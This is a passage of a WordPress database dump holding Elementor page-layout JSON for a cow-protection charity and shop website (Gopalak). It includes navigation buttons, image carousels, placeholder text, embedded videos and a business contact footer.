us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\"},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10249,1713,'_elementor_page_assets','a:0:{}'),(10251,1714,'_elementor_edit_mode','builder'),(10252,1714,'_elementor_template_type','wp-page'),(10253,1714,'_elementor_version','3.7.8'),(10254,1714,'_wp_page_template','elementor_canvas'),(10255,1714,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"el